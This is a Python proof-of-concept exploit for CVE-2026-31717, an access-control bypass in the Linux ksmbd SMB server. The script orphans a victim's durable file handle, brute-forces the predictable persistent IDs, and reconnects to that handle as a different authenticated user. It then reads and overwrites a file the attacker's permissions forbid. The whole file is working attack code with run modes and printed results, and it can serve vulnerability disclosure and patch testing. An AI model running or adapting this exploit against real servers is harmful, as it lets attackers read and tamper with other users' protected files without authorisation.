README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-31717 — ksmbd DHnC durable-handle reconnect access-control bypass
==========================================================================
smb2_check_durable_oplock() in fs/smb/server/oplock.c falls through the
non-lease branch (oplock.c:1852-1864 `goto out`) without verifying the
reconnecting user. parse_durable_handle_context() (smb2pdu.c:2796) only
looks up by attacker-supplied persistent_id; idr_alloc_cyclic() makes
those IDs trivially predictable.
Impact: any authenticated SMB user can hijack an orphaned v1 durable
handle belonging to another user. Subsequent read/write goes through
the original opener's struct file (fp->filp), so kernel_read/write use
the victim's f_cred — bypassing POSIX ACLs.
Affected dialects: SMB 2.1 (0x0210) and above. v1 (DHnQ/DHnC) is the
bruteforceable path; v2 (DH2C) gates by 128-bit CreateGuid.
Public reference:
https://lore.kernel.org/linux-cve-announce/2026050124-CVE-2026-31717-f68b@gregkh/
Modes:
acl-bypass POSIX-0600 ACL-bypass demonstration (headline)
victim Phase 1 only — open + orphan (cross-host setup)
attack Phase 2 only — bruteforce a PID range (cross-host setup)
"""
import argparse
import socket
import struct
import sys
import time
from impacket.smbconnection import SMBConnection
from impacket import smb3, smb3structs as s
from impacket.nt_errors import STATUS_SUCCESS
# NTSTATUS value compared against the result of the plain-CREATE control check.
STATUS_ACCESS_DENIED = 0xC0000022
# Maps the --dialect command-line label to the impacket dialect constant that
# is passed to SMBConnection as preferredDialect.
DIALECT_MAP = {
    "2.1": s.SMB2_DIALECT_21,
    "3.0": s.SMB2_DIALECT_30,
    "3.1.1": s.SMB2_DIALECT_311,
}
# ── Helpers to build raw create contexts ────────────────────────────
def build_create_context(name, data, is_last=True):
    """Serialize one SMB2_CREATE_CONTEXT entry.

    The encoded entry is a 16-byte fixed header, the context name zero-padded
    to an 8-byte boundary, then the data payload.

    Args:
        name: Context name bytes (e.g. b"DHnQ").
        data: Payload bytes placed after the padded name.
        is_last: When True the Next field is 0 and no trailing padding is
            added. When False, Next holds the 8-byte-aligned size of this
            entry and the entry is zero-padded to that size so another
            context can be appended directly after it.

    Returns:
        The encoded context as bytes.
    """
    header_size = 16  # the name starts right after the fixed header

    def align8(length):
        # Round up to the next multiple of 8.
        return (length + 7) & ~7

    padded_name = name.ljust(align8(len(name)), b"\x00")
    payload_start = header_size + len(padded_name)
    body = padded_name + data
    chain_offset = 0 if is_last else align8(header_size + len(body))

    # Header fields: Next, NameOffset, NameLength, Reserved, DataOffset,
    # DataLength.
    header = struct.pack(
        "<IHHHHI",
        chain_offset,
        header_size,
        len(name),
        0,
        payload_start,
        len(data),
    )
    encoded = header + body
    if not is_last:
        # Trailing zeros so the following context starts 8-byte aligned.
        encoded = encoded.ljust(chain_offset, b"\x00")
    return encoded
def build_dhnq_context():
    """Return the encoded DHnQ (Durable Handle Request v1) create context.

    The payload is 16 zero bytes; the context is encoded as the last (only)
    entry in the chain.
    """
    zero_payload = b"\x00" * 16
    return build_create_context(b"DHnQ", zero_payload)
def build_dhnc_context(persistent_id):
    """Return the encoded DHnC (Durable Handle Reconnect v1) create context.

    The payload is an SMB2_FILEID: the given persistent id followed by a
    volatile id of 0, each packed as a little-endian unsigned 64-bit value.
    """
    volatile_id = 0
    file_id_blob = struct.pack("<QQ", persistent_id, volatile_id)
    return build_create_context(b"DHnC", file_id_blob)
# ── SMB2 client wrapper using impacket ──────────────────────────────
class KsmbdClient:
    """Thin wrapper around impacket's SMBConnection for the exploit.

    Holds one connection (``conn``) and one tree connect (``tree_id``).
    CREATE, READ and WRITE requests are assembled by hand so the oplock level
    and create contexts can be set directly.
    """

    # Offset of the CREATE request's variable-length buffer, measured from the
    # start of the SMB2 header: 64-byte header + 56-byte fixed CREATE body
    # (StructureSize is 57, odd).
    _CREATE_BUFFER_OFFSET = 64 + 56
    # STATUS_OBJECT_NAME_NOT_FOUND: the reconnect path treats this as the
    # ordinary "no such id" answer and does not log it.
    _STATUS_OBJECT_NAME_NOT_FOUND = 0xC0000034

    def __init__(self, target, port=445):
        self.target = target
        self.port = port
        self.conn = None  # set by connect_and_auth()
        self.tree_id = None  # set by tree_connect()

    def connect_and_auth(self, username, password, domain="", dialect="3.0"):
        """Connect, negotiate the requested dialect, authenticate.

        ``dialect`` must be a key of DIALECT_MAP; an unknown label raises
        KeyError before any connection is attempted.
        """
        self.conn = SMBConnection(self.target, self.target, sess_port=self.port,
                                  preferredDialect=DIALECT_MAP[dialect],
                                  timeout=30)
        self.conn.login(username, password, domain)
        print(f" [+] Authenticated as '{username}' over SMB {dialect}, "
              f"session=0x{self.conn.getSMBServer()._Session['SessionID']:X}")

    def tree_connect(self, share):
        """Connect to a share and remember the tree id for later requests."""
        self.tree_id = self.conn.connectTree(share)
        print(f" [+] Connected to {share}, tree=0x{self.tree_id:X}")

    def _exchange(self, command, body):
        """Send one SMB2 request on the current tree and return the response."""
        smb = self.conn.getSMBServer()
        pkt = smb3.SMB2Packet()
        pkt['Command'] = command
        pkt['TreeID'] = self.tree_id
        pkt['Data'] = body
        smb.sendSMB(pkt)
        return smb.recvSMB()

    def _send_create(self, create_req, name_area, contexts):
        """Attach the name area and create contexts to a CREATE and send it.

        ``name_area`` is the (already padded) filename region; ``contexts`` is
        the encoded create-context chain placed directly after it. Offsets
        are relative to the start of the SMB2 header.
        """
        create_req['CreateContextsLength'] = len(contexts)
        create_req['Buffer'] = name_area + contexts
        create_req['NameOffset'] = self._CREATE_BUFFER_OFFSET
        create_req['CreateContextsOffset'] = (self._CREATE_BUFFER_OFFSET
                                              + len(name_area))
        return self._exchange(s.SMB2_CREATE, create_req)

    @staticmethod
    def _file_id_from(create_resp):
        """Return (persistent_id, volatile_id, SMB2_FILEID) from a CREATE response."""
        pid = create_resp['FileID'].fields['Persistent']
        vid = create_resp['FileID'].fields['Volatile']
        file_id = s.SMB2_FILEID()
        file_id['Persistent'] = pid
        file_id['Volatile'] = vid
        return pid, vid, file_id

    def create_durable(self, filename):
        """Open/create file with batch oplock + DHnQ (v1 durable handle request).

        Returns (persistent_id, volatile_id, file_id). Raises RuntimeError
        when the server answers with a non-success status. A warning is
        printed when the granted oplock is not BATCH.
        """
        # Build CREATE request manually for full control over oplock + contexts
        create_req = s.SMB2Create()
        create_req['SecurityFlags'] = 0
        create_req['RequestedOplockLevel'] = s.SMB2_OPLOCK_LEVEL_BATCH
        create_req['ImpersonationLevel'] = s.SMB2_IL_IMPERSONATION
        create_req['DesiredAccess'] = (s.FILE_READ_DATA | s.FILE_WRITE_DATA |
                                       s.FILE_READ_ATTRIBUTES | s.DELETE |
                                       s.SYNCHRONIZE)
        create_req['FileAttributes'] = s.FILE_ATTRIBUTE_NORMAL
        create_req['ShareAccess'] = s.FILE_SHARE_READ | s.FILE_SHARE_WRITE
        # FILE_OVERWRITE_IF truncates if existing — keeps the demo's read
        # output clean (no leftover placeholder bytes after the secret).
        create_req['CreateDisposition'] = s.FILE_OVERWRITE_IF
        create_req['CreateOptions'] = s.FILE_NON_DIRECTORY_FILE

        name_bytes = filename.encode("utf-16-le")
        create_req['NameLength'] = len(name_bytes)
        # Zero-pad the name so the create contexts start 8-byte aligned.
        name_area = name_bytes + b"\x00" * (-len(name_bytes) % 8)

        resp = self._send_create(create_req, name_area, build_dhnq_context())
        status = resp['Status']
        if status != STATUS_SUCCESS:
            raise RuntimeError(f"CREATE failed: 0x{status:08X}")

        create_resp = s.SMB2Create_Response(resp['Data'])
        oplock = create_resp['OplockLevel']
        pid, vid, file_id = self._file_id_from(create_resp)
        print(f" [+] Opened '{filename}' - oplock=0x{oplock:02X}, "
              f"persistent_id={pid}, volatile_id={vid}")
        if oplock != s.SMB2_OPLOCK_LEVEL_BATCH:
            print(f" [!] WARNING: Got oplock 0x{oplock:02X}, not BATCH (0x09)")
        return pid, vid, file_id

    def create_reconnect_dhnc(self, persistent_id):
        """Attempt DHnC reconnect to an orphaned durable handle.

        Returns (persistent_id, volatile_id, file_id) on success, None on
        failure. Any failure status other than STATUS_OBJECT_NAME_NOT_FOUND
        is printed before returning None.
        """
        create_req = s.SMB2Create()
        create_req['SecurityFlags'] = 0
        create_req['RequestedOplockLevel'] = s.SMB2_OPLOCK_LEVEL_BATCH
        create_req['ImpersonationLevel'] = s.SMB2_IL_IMPERSONATION
        # DesiredAccess MUST be non-zero - per the original author's note,
        # ksmbd rejects 0 at smb2pdu.c:3090 before reaching the durable
        # context handler. Read and write data access are requested here.
        create_req['DesiredAccess'] = s.FILE_READ_DATA | s.FILE_WRITE_DATA
        create_req['FileAttributes'] = 0
        create_req['ShareAccess'] = s.FILE_SHARE_READ | s.FILE_SHARE_WRITE
        create_req['CreateDisposition'] = s.FILE_OPEN
        create_req['CreateOptions'] = s.FILE_NON_DIRECTORY_FILE
        # Empty filename: NameLength is 0, but 8 zero bytes still occupy the
        # name area ahead of the contexts.
        create_req['NameLength'] = 0
        name_area = b"\x00" * 8

        resp = self._send_create(create_req, name_area,
                                 build_dhnc_context(persistent_id))
        status = resp['Status']
        if status != STATUS_SUCCESS:
            if status != self._STATUS_OBJECT_NAME_NOT_FOUND:
                print(f" [*] pid={persistent_id}: status=0x{status:08X}")
            return None
        return self._file_id_from(s.SMB2Create_Response(resp['Data']))

    @staticmethod
    def _status_from_exception(exc):
        """Best-effort extraction of an NT status code from an exception.

        Prefers an error-code accessor on the exception object when one is
        present (NOTE(review): impacket's SessionError classes are expected
        to expose one — confirm for the installed version), then falls back
        to scanning the message text. Returns None when no code is found.
        """
        for accessor in ("getErrorCode", "get_error_code"):
            getter = getattr(exc, accessor, None)
            if callable(getter):
                try:
                    return int(getter())
                except (TypeError, ValueError):
                    continue
        msg = str(exc).upper()
        if "ACCESS_DENIED" in msg or "C0000022" in msg:
            return STATUS_ACCESS_DENIED
        for tok in msg.replace(",", " ").split():
            if tok.startswith("0X"):
                try:
                    return int(tok, 16)
                except ValueError:
                    pass
        return None

    def normal_create_status(self, filename, access=s.FILE_READ_DATA):
        """Plain CREATE with no DH context, used as the ACL control test.

        On a 0600 file owned by another user the expected answer is
        STATUS_ACCESS_DENIED. Returns the NT status code (STATUS_SUCCESS or
        the error code). If the open fails and no status code can be
        recovered from the exception, the exception is re-raised.
        """
        try:
            file_id = self.conn.openFile(self.tree_id, filename,
                                         desiredAccess=access,
                                         shareMode=s.FILE_SHARE_READ,
                                         creationDisposition=s.FILE_OPEN)
        except Exception as e:
            status = self._status_from_exception(e)
            if status is None:
                raise
            return status
        try:
            # Best-effort cleanup; the open itself is the result we report.
            self.conn.closeFile(self.tree_id, file_id)
        except Exception:
            pass
        return STATUS_SUCCESS

    def read_file(self, file_id, offset=0, length=4096):
        """Read from an open file handle and return the response buffer.

        Raises RuntimeError on a non-success status.
        """
        read_req = s.SMB2Read()
        read_req['Padding'] = 0x50
        read_req['Length'] = length
        read_req['Offset'] = offset
        read_req['FileID'] = file_id
        read_req['MinimumCount'] = 0
        read_req['RemainingBytes'] = 0
        resp = self._exchange(s.SMB2_READ, read_req)
        status = resp['Status']
        if status != STATUS_SUCCESS:
            raise RuntimeError(f"READ failed: 0x{status:08X}")
        return s.SMB2Read_Response(resp['Data'])['Buffer']

    def write_file(self, file_id, data, offset=0):
        """Write to an open file handle and return the server-reported count.

        Raises RuntimeError on a non-success status.
        """
        write_req = s.SMB2Write()
        write_req['FileID'] = file_id
        write_req['Length'] = len(data)
        write_req['Offset'] = offset
        write_req['WriteChannelInfoOffset'] = 0
        write_req['WriteChannelInfoLength'] = 0
        write_req['Channel'] = 0
        write_req['RemainingBytes'] = 0
        write_req['Flags'] = 0
        write_req['Buffer'] = data
        resp = self._exchange(s.SMB2_WRITE, write_req)
        status = resp['Status']
        if status != STATUS_SUCCESS:
            raise RuntimeError(f"WRITE failed: 0x{status:08X}")
        return s.SMB2Write_Response(resp['Data'])['Count']

    def disconnect_orphan(self, graceful=False):
        """Drop the session WITHOUT closing the durable handle.

        Default: set SO_LINGER {1, 0} and close the socket, intended to end
        the TCP connection with an RST — models a real orphan event (laptop
        sleep, WiFi roam, VPN flap, NIC down). graceful=True sends SMB2
        LOGOFF and closes the session instead. The same graceful path is the
        fallback when the socket cannot be obtained or the RST attempt fails.
        Per the original author's notes, either way fp->conn becomes NULL and
        the handle persists in global_ft until the durable scavenger reaps it.

        Does nothing when there is no connection. ``conn`` is reset to None
        afterwards.
        """
        if self.conn is None:
            # Nothing to tear down; avoid reporting a logoff that never ran.
            return
        try:
            sock = self.conn.getSMBServer().get_socket()
        except Exception:
            sock = None
        if not graceful and sock is not None:
            try:
                sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
                                struct.pack("ii", 1, 0))
                sock.close()
            except Exception as e:
                print(f" [!] RST failed ({e}); falling back to graceful close")
            else:
                print(" [+] TCP RST sent — handle orphaned in ksmbd")
                self.conn = None
                return
        # Graceful teardown is deliberately best-effort: each step may fail
        # independently (e.g. the transport is already gone).
        try:
            self.conn.logoff()
        except Exception:
            pass
        try:
            self.conn.getSMBServer().close_session()
        except Exception:
            pass
        print(" [+] Session graceful logoff (LOGOFF + FIN) — handle orphaned")
        self.conn = None
# ── Exploit phases ──────────────────────────────────────────────────
def phase_victim(args, secret=b"1337 stuff\n"):
    """Phase 1: open a file as the victim with a v1 durable handle and orphan it.

    Connects with args.user/args.password, opens args.file with batch oplock
    + DHnQ, writes ``secret``, reads it back, then drops the session via
    disconnect_orphan (TCP RST unless args.graceful is set).

    Returns the persistent id of the orphaned handle.
    """
    print("[*] Phase 1: Victim creates durable handle")
    print(f" Target: {args.target}:{args.port}")
    print(f" Share: {args.share}")
    print(f" User: {args.user}")
    print(f" File: {args.file}")

    client = KsmbdClient(args.target, args.port)
    client.connect_and_auth(args.user, args.password, args.domain,
                            dialect=args.dialect)
    client.tree_connect(args.share)

    handle_pid, _volatile, handle = client.create_durable(args.file)
    byte_count = client.write_file(handle, secret)
    print(f" [+] Wrote {byte_count} bytes of sensitive data")

    echoed = client.read_file(handle, length=len(secret))
    print(f" [+] Verified read: {echoed[:50]}...")
    print(f"\n [*] Persistent ID to target: {handle_pid}")

    client.disconnect_orphan(graceful=args.graceful)
    print(f" [+] Handle {handle_pid} orphaned (persists until durable scavenger timeout).\n")
    return handle_pid
def phase_attack(args, known_pid=None):
    """Phase 2: scan a persistent-id range for a handle that accepts DHnC.

    Credentials come from args.user2/args.password2 when present and
    non-empty, otherwise args.user/args.password. The range is
    args.pid_start..args.pid_end inclusive (defaults 0..64); ``known_pid``,
    when given, is tried first. The scan stops at the first successful
    reconnect, after one read and one write attempt on that handle.

    Returns the list of hijacked persistent ids (empty when none was found).
    """
    print("[*] Phase 2: Attacker hijacks orphaned durable handle")
    atk_user = getattr(args, "user2", None) or args.user
    atk_pass = getattr(args, "password2", None) or args.password
    print(f" Target: {args.target}:{args.port}")
    print(f" User: {atk_user}")
    pid_start = getattr(args, "pid_start", 0)
    pid_end = getattr(args, "pid_end", 64)
    print(f" Brute-force range: {pid_start}-{pid_end}")

    def open_session():
        # Fresh authenticated client with the share already connected.
        session = KsmbdClient(args.target, args.port)
        session.connect_and_auth(atk_user, atk_pass, args.domain,
                                 dialect=args.dialect)
        session.tree_connect(args.share)
        return session

    client = open_session()
    print(" [*] Scanning persistent IDs for orphaned durable handles...")

    # Known id (if any) goes first; the rest of the range follows in order.
    candidates = [p for p in range(pid_start, pid_end + 1) if p != known_pid]
    if known_pid is not None:
        candidates.insert(0, known_pid)

    hijacked = []
    for pid in candidates:
        try:
            outcome = client.create_reconnect_dhnc(pid)
        except Exception as e:
            # Connection may reset - reconnect, then move on to the next id.
            print(f" [*] Error at pid={pid}: {e}, reconnecting...")
            try:
                client = open_session()
            except Exception:
                print(" [!] Reconnect failed, aborting scan")
                break
            continue

        if outcome is None:
            if pid % 10 == 0 and pid != known_pid:
                sys.stdout.write(f"\r [*] Scanned pid={pid}...")
                sys.stdout.flush()
            continue

        new_fid = outcome[2]
        print(f"\n [!!] HIJACKED persistent_id={pid} as '{atk_user}'")
        try:
            data = client.read_file(new_fid, length=4096).rstrip(b"\x00").rstrip()
            print(f" [!!] READ {len(data)} bytes: {data!r}")
        except Exception as e:
            print(f" [*] Read attempt: {e}")
        try:
            written = client.write_file(new_fid, b"It's my session now :)\n", offset=0)
            print(f" [!!] WROTE {written} bytes (overwrote victim's content)")
        except Exception as e:
            print(f" [*] Write attempt: {e}")
        hijacked.append(pid)
        break  # Got one

    if hijacked:
        print(f"\n [+] Successfully hijacked {len(hijacked)} handle(s): {hijacked}")
    else:
        print(f"\n [-] No orphaned durable handles found in range {pid_start}-{pid_end}")
    return hijacked
def phase_acl_bypass(args):
    """Headline scenario: prove POSIX 0600 ACL bypass.

    Sequence:
      (a) phase_victim opens args.file, writes a secret and orphans the handle.
      (b)+(c) the attacker (args.user2/args.password2) authenticates and a
          plain CREATE is expected to be denied (pre-exploit control).
      (d) DHnC reconnect to the victim's persistent id, then read + write.
          If the direct reconnect fails, phase_attack is run over pid±2; it
          performs its own read/write on the handle it obtains.
      (e) a fresh attacker session repeats the plain CREATE (post-exploit
          control).

    If normal CREATE is denied to the attacker both before AND after the
    hijack, but the attacker can read+write via DHnC reconnect, then
    f_cred-bypass is the only explanation.

    Returns None. Side effect: on the fallback path args.pid_start and
    args.pid_end are overwritten.
    """
    print("=" * 70)
    print("CVE-2026-31717 PoC — POSIX ACL bypass via DHnC durable-handle hijack")
    print("=" * 70)
    print()
    atk_user, atk_pass = args.user2, args.password2
    rw = s.FILE_READ_DATA | s.FILE_WRITE_DATA

    def attacker_session():
        # Fresh authenticated attacker client with the share connected.
        c = KsmbdClient(args.target, args.port)
        c.connect_and_auth(atk_user, atk_pass, args.domain, dialect=args.dialect)
        c.tree_connect(args.share)
        return c

    def control_check(c, label):
        # True when a plain CREATE for read+write is refused with ACCESS_DENIED.
        st = c.normal_create_status(args.file, access=rw)
        if st == STATUS_ACCESS_DENIED:
            print(f" [+] CONTROL {label}: normal CREATE → STATUS_ACCESS_DENIED ✓")
            return True
        print(f" [!] CONTROL {label}: status=0x{st:08X} (expected 0xC0000022)")
        return False

    # (a) Victim opens, writes, abrupt-disconnects.
    pid = phase_victim(args, secret=b"TOP SECRET\n")
    print("[*] Waiting 3 seconds for ksmbd to mark the handle orphaned...")
    time.sleep(3)

    # (b)+(c) Attacker authenticates and proves it can't reach the file normally.
    print(f"\n[*] Phase 2: Attacker '{atk_user}' attempts ACL bypass")
    c = attacker_session()
    if not control_check(c, "pre-exploit"):
        print(f" Server-side ACL setup is wrong ({atk_user} can already "
              f"access {args.file}). Aborting demo.")
        return

    # (d) Exploit: DHnC reconnect, read+write through victim's f_cred.
    print(f"\n [*] DHnC reconnect to known pid={pid}")
    result = c.create_reconnect_dhnc(pid)
    if result is None:
        print(" [-] direct reconnect failed; brute-forcing pid±2")
        try:
            c.disconnect_orphan(graceful=True)
        except Exception:
            pass
        args.pid_start, args.pid_end = max(0, pid - 2), pid + 2
        if not phase_attack(args, known_pid=pid):
            print(" [-] No handle hijacked. Was the victim's pid reaped already?")
            return
        # phase_attack already read and overwrote the file through the handle
        # it obtained, and `c` is closed; there is no handle to use here, so
        # go straight to the post-exploit control.
        expected_contents = "It's my session now :)\\n"
    else:
        _, _, new_fid = result
        print(f" [!!] HIJACKED persistent_id={pid}")
        data = c.read_file(new_fid, length=4096).rstrip(b"\x00")
        print(f" [!!] READ as {atk_user}: {data!r} (POSIX 0600 bypassed)")
        written = c.write_file(new_fid, f"PWNED by {atk_user}\n".encode())
        print(f" [!!] WROTE {written} bytes as {atk_user} (POSIX 0600 bypassed)")
        expected_contents = f"PWNED by {atk_user}\\n"
        try:
            c.disconnect_orphan(graceful=True)
        except Exception:
            pass

    # (e) Reconnect cleanly and prove the file mode is unchanged.
    print()
    if control_check(attacker_session(), "post-exploit"):
        print(f" File POSIX mode unchanged; writes only succeeded because "
              f"the hijacked fp->filp carried the victim's f_cred.")
    print(f"\n [+] Server-side verification (run on the ksmbd host):")
    print(f" stat {args.file} && cat {args.file}")
    print(f" Expect: 0600 victim:victim, contents = '{expected_contents}'")
# ── Main ────────────────────────────────────────────────────────────
def main():
    """Parse the command line and run the selected mode.

    Three sub-commands are defined (victim, attack, acl-bypass). All share
    the connection/credential options; --file, --pid-start/--pid-end and
    --user2/--password2 are added only to the modes listed below.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2026-31717: ksmbd DHnC durable-handle hijack PoC",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=__doc__,
    )
    subcommands = parser.add_subparsers(dest="mode", required=True)

    mode_help = {
        "victim": "Create durable handle as victim",
        "attack": "Hijack orphaned handle as attacker",
        "acl-bypass": "Headline: POSIX 0600 ACL bypass",
    }
    for mode, summary in mode_help.items():
        cmd = subcommands.add_parser(mode, help=summary)
        # Options common to every mode.
        cmd.add_argument("--target", required=True, help="ksmbd server IP")
        cmd.add_argument("--port", type=int, default=445)
        cmd.add_argument("--share", required=True, help="Share name")
        cmd.add_argument("--user", required=True, help="Username")
        cmd.add_argument("--password", required=True, help="Password")
        cmd.add_argument("--domain", default="")
        cmd.add_argument("--dialect", choices=list(DIALECT_MAP), default="3.0",
                         help="SMB dialect to negotiate (default: 3.0; 2.1 also works)")
        cmd.add_argument("--graceful", action="store_true",
                         help="Use SMB2 LOGOFF + FIN instead of TCP RST when orphaning")
        # Mode-specific options.
        if mode in ("victim", "acl-bypass"):
            cmd.add_argument("--file", default="secret.txt")
        if mode == "attack":
            cmd.add_argument("--pid-start", type=int, default=0)
            cmd.add_argument("--pid-end", type=int, default=64)
        if mode == "acl-bypass":
            cmd.add_argument("--user2", required=True, help="Attacker username")
            cmd.add_argument("--password2", required=True, help="Attacker password")

    args = parser.parse_args()
    handlers = {
        "victim": phase_victim,
        "attack": phase_attack,
        "acl-bypass": phase_acl_bypass,
    }
    handler = handlers.get(args.mode)
    if handler is not None:
        handler(args)


if __name__ == "__main__":
    main()